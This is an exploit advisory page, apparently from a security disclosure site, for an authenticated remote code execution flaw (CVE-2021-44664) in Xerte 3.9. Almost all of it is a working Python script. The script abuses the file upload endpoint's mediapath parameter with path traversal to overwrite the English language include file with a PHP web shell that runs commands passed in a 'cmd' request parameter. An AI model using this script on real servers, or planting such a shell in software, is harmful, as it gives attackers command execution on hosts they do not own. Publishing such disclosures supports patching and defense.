Xerte 3.9 Remote Code Execution

2022.03.02
Credit: Rik Lutz
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated) # Date: 05/03/2021 # Exploit Author: Rik Lutz # Vendor Homepage: https://xerte.org.uk # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip # Version: up until version 3.9 # Tested on: Windows 10 XAMP # CVE : CVE-2021-44664 # This PoC assumes guest login is enabled and the en-GB langues files are used. # This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell. # Vulnerable url: https://<host>/website_code/php/import/fileupload.php # The mediapath variable can be used to set the destination of the uploaded. # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota import requests import re xerte_base_url = "http://127.0.0.1" php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. with requests.Session() as session: # Get a PHP session ID if not php_session_id: session.get(xerte_base_url) else: session.cookies.set("PHPSESSID", php_session_id) # Use a default template data = { 'tutorialid': 'Nottingham', 'templatename': 'Nottingham', 'tutorialname': 'exploit', 'folder_id': '' } # Create a new project in order to find the install path template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) # Find template ID data = { 'template_id': re.findall('(\d+)', template_id.text)[0] } # Find the install path: install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3', 'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978', } # index.inc file data = \ '''-----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc" Content-Type: application/octet-stream <?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; } /** * * index.php english language file * * @author Patrick Lockley * @version 1.0 * @copyright Pat Lockley * @package */ define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password"); define("INDEX_USERNAME_EMPTY", "Please enter your username"); define("INDEX_PASSWORD_EMPTY", "Please enter your password"); define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page"); define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct"); define("INDEX_LOGIN", "login area"); define("INDEX_USERNAME", "Username"); define("INDEX_PASSWORD", "Password"); define("INDEX_HELP_TITLE", "Getting Started"); define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website."); define("INDEX_HELP_INTRO_LINK_TEXT","Show me!"); define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); define("INDEX_FOLDER_PROMPT","What would you like to call your folder?"); define("INDEX_WORKSPACE_TITLE","My Projects"); define("INDEX_CREATE","Project Templates"); define("INDEX_DETAILS","Project Details"); define("INDEX_SORT","Sort"); define("INDEX_SEARCH","Search"); define("INDEX_SORT_A","Alphabetical A-Z"); define("INDEX_SORT_Z","Alphabetical Z-A"); define("INDEX_SORT_NEW","Age (New to Old)"); define("INDEX_SORT_OLD","Age (Old to New)"); define("INDEX_LOG_OUT","Log out"); define("INDEX_LOGGED_IN_AS","Logged in as"); define("INDEX_BUTTON_LOGIN","Login"); define("INDEX_BUTTON_LOGOUT","Logout"); define("INDEX_BUTTON_PROPERTIES","Properties"); define("INDEX_BUTTON_EDIT","Edit"); define("INDEX_BUTTON_PREVIEW", "Preview"); define("INDEX_BUTTON_SORT", "Sort"); define("INDEX_BUTTON_NEWFOLDER", "New Folder"); define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create"); define("INDEX_BUTTON_DELETE", "Delete"); define("INDEX_BUTTON_DUPLICATE", "Duplicate"); define("INDEX_BUTTON_PUBLISH", "Publish"); define("INDEX_BUTTON_CANCEL", "Cancel"); define("INDEX_BUTTON_SAVE", "Save"); define("INDEX_XAPI_DASHBOARD_FROM", "From:"); define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:"); define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:"); define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups"); define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses"); define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard"); define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options"); define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns"); define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview"); define("INDEX_XAPI_DASHBOARD_PRINT", "Print"); \r \r -----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="mediapath" ''' \ + install_path \ + '''../../../languages/en-GB/ -----------------------------170331411929658976061651588978--\r ''' # Overwrite index.inc file response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data) print('Installation path: ' + install_path) print(response.text) if "success" in response.text: print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top